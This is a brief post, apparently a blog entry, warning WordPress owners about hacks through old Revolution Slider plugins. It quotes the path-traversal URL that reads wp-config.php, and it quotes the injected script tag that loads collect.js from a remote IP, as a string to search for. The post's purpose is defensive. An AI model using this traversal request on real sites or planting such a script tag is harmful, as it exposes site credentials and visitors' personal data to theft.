
Last week, Wordpress sites worldwide were hacked with the following simple line of code:
http://victim.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Let's not go into details here and now, but if you have an old version of the "Revolution Slider" installed you better grep around for the following string:
<script language="JavaScript" src="http://122.155.168.105/ads/inpage/pub/collect.js" type="text/javascript"></script>
...and if you find it, check with Google Webmaster Tools to see if your site has been flagged for malicious content. Chances are your site is causing people to have their personal information stolen and fed to unsavory characters.
http://blog.sucuri.net/2014/12/soaksoak-payload-analysis-evolution-of-co...